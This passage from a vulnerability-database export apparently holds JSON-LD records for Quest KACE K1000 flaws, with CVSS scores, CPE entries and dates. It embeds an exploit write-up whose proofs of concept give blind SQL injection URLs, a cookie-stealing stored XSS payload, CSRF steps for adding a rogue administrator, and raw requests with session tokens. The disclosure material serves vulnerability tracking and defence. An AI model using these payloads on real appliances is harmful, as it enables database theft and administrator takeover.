"data": "service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter. Quest KACE K1000 Systems Management An injection vulnerability exists in the appliance.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Quest Software KACE K1000 Systems Management Appliance (KACE SMA) is a system management device from Quest Software, USA. \n\r\n\r\nThe service / krashrpt.php file in Quest Software KACE SMA 6.4 SP3 (6.4.120822) and earlier versions has a security vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "VULMON",
"id": "CVE-2019-20504"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20504",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-16728",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202003-387",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2019-20504",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"id": "VAR-202003-0967",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
}
],
"trust": 1.225
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
}
]
},
"last_update_date": "2023-12-18T13:47:34.716000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Patch for Quest Software KACE K1000 Systems Management Appliance code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/208349"
},
{
"title": "Quest Software KACE K1000 Systems Management Appliance Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=111677"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/canonical/ubuntu-com-security-api "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-74",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "NVD",
"id": "CVE-2019-20504"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "https://www.rcesecurity.com/2019/04/dell-kace-k1000-remote-code-execution-the-story-of-bug-k1-18652/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20504"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20504"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://github.com/canonical/ubuntu-com-security-api"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"date": "2020-03-09T00:00:00",
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"date": "2020-03-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"date": "2020-03-09T01:15:11.233000",
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"date": "2020-03-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-16728"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2019-20504"
},
{
"date": "2020-03-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014852"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2019-20504"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE K1000 Systems Management Appliance injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014852"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-387"
}
],
"trust": 0.6
}
}
VAR-201906-1119
Vulnerability from variot - Updated: 2023-12-18 12:28
The Quest Kace K1000 Appliance, versions prior to 9.0.270, allows an authenticated least privileged user with 'User Console Only' rights to potentially inject arbitrary JavaScript code on the tickets page. Script execution could allow a malicious user of the system to steal session cookies of other users including Administrator and take over their session. This can further be exploited to launch other attacks. The software also does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. An authenticated user with 'user console only' rights may inject arbitrary JavaScript, which could result in an attacker taking over a session of others, including an Administrator. The Quest Kace System Management (K1000) Appliance contains multiple vulnerabilities, including a blind SQL injection vulnerability and a stored cross site scripting vulnerability. It also suffers from misconfigurations in the cross-origin resource sharing (CORS) mechanism and improperly validates source communications. Quest Kace K1000 Appliance contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. Quest Software Kace K1000 Appliance is a system management device from Quest Software, USA. This product is mainly used for software license management, patch and endpoint security management, software distribution and server monitoring. A cross-site scripting vulnerability exists in versions prior to Quest Software Kace K1000 Appliance 9.0.270 that could allow an attacker to execute client-side code.
# Exploit Title: [Dell Kace Appliance Multiple Vulnerabilities]
Date: [12/04/2018]
Exploit Author: [SlidingWindow], Twitter: @kapil_khot
Vendor Homepage: [https://www.quest.com/products/kace-systems-management-appliance/]
Affected Versions: [KACE SMA versions prior to 9.0.270 PATCH SEC2018_20180410]
Tested on: [Quest Kace K1000 Appliance versions, 8.0.318, 8.0.320 and 9.0.270 ]
CVE : [CVE-2018-5404,CVE-2018-5405,CVE-2018-5406]
CERT Advisory: [https://www.kb.cert.org/vuls/id/877837/]
Vendor Advisory: https://support.quest.com/kb/288310/cert-coordination-center-report-update
==================
Product:-
==================
Quest KACE, formerly Dell KACE, is a company that specializes in computer appliances for systems management of information technology equipment.
========================
Vulnerability Details:-
========================
=====================================================================================================================================================
1. Blind SQL Injection Vulnerability in Ajax_Lookup_List.PHP (CVE-2018-5404)
=====================================================================================================================================================
The Dell Kace appliance intends ajax_lookup_list.php for Admin users; however, it can also be accessed by a least-privileged user with 'User Console Only' rights. In addition, the user input supplied to the 'selvalue' parameter is not sanitized, which leads to a Blind SQL Injection vulnerability.
Proof-Of-Concept:
- Send following request to the target:
GET /common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 HTTP/1.1 Host: 192.168.247.100 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.247.100/userui/ticket.php?QUEUE_ID=1 Cookie: kbox_nav=1; KACE_LAST_USER=%98%B59%CB%D9%27f+%28%B6%83b%0F8a%EF; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i0b4qhnv66qg41893hb1q5g146; KACE_CSRF_TOKEN=4862fbb6808731e6658aeca4ea48bd2cac08502ca289e1d3305875b165fb2c86d5441145152ada3f3c701cf2387db6086e7c349c5265ec3b2110978a70ebde6f; KONEA=ebWI%2BP%2FFEgmTioFCZ3xVTgsN174jAtY0mkDdAov5uZtJEpn2FziBYMEinZsmN63zlNfEooUtIXJDgiJgmSKfFk3VvQguPiEAYQIaYpMhcFRQkfyANLWQy2tJzS8mByjYxJZlBRcYhJYlVqAMppyuikdVPOQRynpbiRNSIqVlX0wyxIBFaoF4b8O09p4wYkritpr1qM%2BMoLmA2n3%2BQCY2u%2FvD8DdrIVtm8t2%2BNxMVCCZjfpqpjKef73l7xx2yBxlV9kRG04gPNHXFfv8f4TZB82%2FvurTFqgOWThxp51YjdpWfssEJQsss1O1B3FtYEH0h83Wrl9ABzsRx%2FZafVGjQTw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjozLCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6IjRkMzkwY2M2ODMzZTRkMjk4MTI0NzYyYmQwYjdiNzRjIiwiZXhwIjoxNTIxMzA3NTExfQ.S9h0USN7xS0VmeapB6zWqKnAW-e-vd9J9-NrH9383gSXX6K_vEgXSv0FpuPGCtYQ2I3o7gxuYBKxy_qCqp1xd2w2NRowiZb5_WlwoHBWeTnaP3D9Y6Ek4nd9CKgPaZF1Y8TtaZkdbbWWFTdjtpkD3CK5eNHX_lsqtPD_gVJWwxc Connection: close
-
Make a note of Content-Length in the response body.
-
Send following request:
http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13'&queue_id=1&limit=10&org_id=1&locale=en_US&id=13
-
Response to above request shows that an error occurred and we are being redirected to /common/error.php
-
Final payload to check if we get the original response back:
http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13''&queue_id=1&limit=10&org_id=1&locale=en_US&id=13
- These tests confirm that the 'selvalue' parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database.
=========================================================================================================================================================
2. Blind SQL Injection Vulnerability in Oval_Detail.PHP (CVE-2018-5404)
=========================================================================================================================================================
The Dell Kace appliance allows Admin users to view OVAL templates via 'oval_detail.php', which can also be accessed by a user with 'Read Only Administrator' rights. In addition, the user input supplied to the ID parameter is not sanitized, which leads to a Blind SQL Injection vulnerability. An authenticated user with 'Read Only Administrator' rights could exploit this vulnerability to retrieve sensitive information from the database.
Proof-Of-Concept:
- Send following request to the target:
GET /adminui/oval_detail.php?ID=6200 HTTP/1.1 Host: 192.168.247.100 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.247.100/adminui/oval_list.php Cookie: kbox_nav=1; KACE_LAST_USER=%9A%95%91%5E%AF%B2%A6%FA%02M%B5%7D%08%87%D52; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i48m8gm8kcnbiptc28pq8u7uq1; KACE_CSRF_TOKEN=96acbdac36b0143958a7d96ba318eb5c626884d46733a8ed05c88cfe94d80cfdebe6bd9790ff4fec3a79fa988ff828dac4d841356c72eebb015d20c5ffd5a01a; KONEA=xvqV3k6fWuhsnypD45pPw4OPs7fZxUDP24mubodoYiSj8Y8EqJpUnakrq%2BHEefSs0YkzglNboWvUhE%2FuavTZZrkyNPMF1IH2QB%2FIF7jSm6fLukuuMyLgTFZWtOg16t5eJqCXvn0f54tfwFnfB1tobY%2Fu6MDe8BOWKaj6mByvdD6kNREg%2B%2FLwAcfIYmgJNKYu0Wd9JwsRpWpuRyZkejbrZB%2FSlkh80oHvHSey0inQmIy7B4bYnPCPUfTU8qPeZLaPcvYFchruj%2BabBazlHAaq44txeUy2AtG85ntiN8XPXoZnflHOD%2B5WjTywTtRGiRpCQVQNDbHTOdSUuljpDEyjrw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjo0LCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6ImVlMTk3ZGE5NmFmYTRiYzViYzk5Y2VhMzI3ZjQ2OTdiIiwiZXhwIjoxNTIxMjk3MzE5fQ.GHuAWu_mcviKl0HQcFjY0In5aJxgB-WZCaHP5XQMdpdboby0b1qnwh4DyC3TQg4PktBm_D0Vu4LOMY5KWGRvwOQCTwrzBFLg3ogsKWb0AMO3RArrENXxEO3P3K6XFQCEIlpU9n9K1APnnRSTsfPEL7GC5GkzixakXAlZMZzLB_0 Connection: close Upgrade-Insecure-Requests: 1
-
Response to above request shows some content with the content length of 32109 bytes:
-
It shows information about OVAL-ID#24253:
-
Now send following payload that tests this ID parameter for a true condition:
http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6432
-
Response to above request again shows information about the same OVAL-ID#24252:
-
Now, use following payload to test this ID parameter for a false condition:
http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6444
-
The response to false condition is different than the response to normal and/or true condition. This response does not show any information about any OVAL-ID:
-
These tests confirm that the ID parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database.
=========================================================================================================================================================
3. This script executes every time a user visits this page.
Proof-Of-Concept:
- Log into the Dell Kace K1000 web interface as a least privileged user.
- Navigate to Service Desk-->Tickets and create a new ticket.
-
Inject following payload in the Summary section:
Test Ticketalert("XSSinSummary");alert(document.cookie);<!--
-
Save the ticket.
- Go back to tickets and view this newly created ticket and a couple of alert boxes should pop up.
=========================================================================================================================================================
4. Misconfigured CORS Vulnerability (CVE-2018-5406)
=========================================================================================================================================================
The Dell Kace K1000 fails to implement Cross-Origin Resource Sharing (CORS) properly, which enables a Cross-Site Request Forgery (CSRF) attack.
An unauthenticated, remote attacker could exploit this vulnerability to perform sensitive actions such as adding a new administrator account or changing the appliance's settings. Likewise, a malicious internal user of the organization could induce an administrator of this appliance to visit a malicious link that exploits this vulnerability to perform the same sensitive actions.
Proof-Of-Concept:
- Try to create a new user and capture the request in BurpSuite to create a CSRF PoC from there. Create an HTML form and put it under Web Root of your Kali machine.
- Log into the web interface of the appliance as admin.
- Open a new tab in the same browser and access the HTML page from #1
- Save the ticket.
- Submit the request (This can be modified to submit the request automatically).
- Check BurpSuite to see if the request to add user ‘Hacker’ was sent to the appliance and if it was originated from your Kali machine
- Check the admin console to see if user Hacker has been added:
===================================
Vulnerability Disclosure Timeline:
===================================
04/2018: Submitted report to CERT-US.
04/2018: CERT-US reported the issue to vendor.
05/2018: Awaiting vendor response.
10/2018: Vendor asked to test the patch as they had already fixed these issues.
10/2018: Confirmed that all the vulnerabilities except Vulnerability #2 are fixed in 9.0.270; Vulnerability #2 still exists in the other patched version.
01/2019: Vendor confirmed that they are working on fixing all of the vulnerabilities and would release a patch on May 01 2019, and asked to publish this on June 01 2019 so that customers have enough time to patch.
05/2019: Vendor published an advisory.
06/2019: CERT-US published a Vulnerability Note, VU#877837
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-1119",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace systems management appliance",
"scope": "lt",
"trust": 1.8,
"vendor": "quest",
"version": "9.0.270"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "quest kace",
"version": null
},
{
"model": "software kace k1000 appliance",
"scope": "lt",
"trust": 0.6,
"vendor": "quest",
"version": "9.0.270"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#877837"
},
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "NVD",
"id": "CVE-2018-5405"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:quest:kace_systems_management_appliance_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.0.270",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:quest:kace_systems_management_appliance:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5405"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SlidingWindow",
"sources": [
{
"db": "PACKETSTORM",
"id": "153150"
}
],
"trust": 0.1
},
"cve": "CVE-2018-5405",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-5405",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-21111",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-5405",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-5405",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-21111",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-042",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21111"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015577"
},
{
"db": "NVD",
"id": "CVE-2018-5405"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-042"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Quest Kace K1000 Appliance, versions prior to 9.0.270, allows an authenticated least privileged user with \u0027User Console Only\u0027 rights to potentially inject arbitrary JavaScript code on the tickets page. Script execution could allow a malicious user of the system to steal session cookies of other users including Administrator and take over their session. This can further be exploited to launch other attacks. The software also does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other user. An authenticated user with \u0027user console only\u0027 rights may inject arbitrary JavaScript, which could result in an attacker taking over a session of others, including an Administrator. The Quest Kace System Management (K1000) Appliance contains multiple vulnerabilities, including a blind SQL injection vulnerability and a stored cross site scripting vulnerability. It also suffers from misconfigurations in the cross-origin resource sharing (CORS) mechanism and improperly validates source communications. Quest Kace K1000 Appliance Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. QuestSoftwareKaceK1000Appliance is a system management device from QuestSoftware, USA. This product is mainly used for software license management, patch and endpoint security management, software distribution and server monitoring. A cross-site scripting vulnerability exists in versions prior to QuestKaceK1000Appliance 9.0.270 that could allow an attacker to execute client-side code. 
# Exploit Title: [Dell Kace Appliance Multiple Vulnerabilities]\n# Date: [12/04/2018]\n# Exploit Author: [SlidingWindow], Twitter: @kapil_khot\n# Vendor Homepage: [https://www.quest.com/products/kace-systems-management-appliance/]\n# Affected Versions: [KACE SMA versions prior to 9.0.270 PATCH SEC2018_20180410]\n# Tested on: [Quest Kace K1000 Appliance versions, 8.0.318, 8.0.320 and 9.0.270 ]\n# CVE : [CVE-2018-5404,CVE-2018-5405,CVE-2018-5406]\n#CERT Advisory: [https://www.kb.cert.org/vuls/id/877837/]\n#Vendor Advisory: https://support.quest.com/kb/288310/cert-coordination-center-report-update\n\n\n==================\n#Product:-\n==================\nQuest KACE, formerly Dell KACE, is a company that specializes in computer appliances for systems management of information technology equipment. \n\n========================\n#Vulnerability Details:-\n========================\n\n=====================================================================================================================================================\n1. Blind SQL Injection Vulnerability in Ajax_Lookup_List.PHP (CVE-2018-5404)\n=====================================================================================================================================================\n\nThe Dell Kace allows Admin users to access ajax_lookup_list.php. However, it can be accessed by a least privileged user with \u2018User Console Only\u2019 rights. Also, the user input supplied to \u0027selvalue\u0027 parameter is not sanitized that leads to a Blind SQL Injection vulnerability. \n\n#Proof-Of-Concept:\n------------------\n1. 
Send following request to the target:\n\nGET /common/ajax_lookup_list.php?query_type=submitter\u0026parent_mapping=false\u0026place_holder=Unassigned\u0026suppress_place_holder_as_choice=false\u0026selected=13\u0026selvalue=13\u0026queue_id=1\u0026limit=10\u0026org_id=1\u0026locale=en_US\u0026id=13 HTTP/1.1\nHost: 192.168.247.100\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nReferer: http://192.168.247.100/userui/ticket.php?QUEUE_ID=1\nCookie: kbox_nav=1; KACE_LAST_USER=%98%B59%CB%D9%27f+%28%B6%83b%0F8a%EF; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i0b4qhnv66qg41893hb1q5g146; KACE_CSRF_TOKEN=4862fbb6808731e6658aeca4ea48bd2cac08502ca289e1d3305875b165fb2c86d5441145152ada3f3c701cf2387db6086e7c349c5265ec3b2110978a70ebde6f; 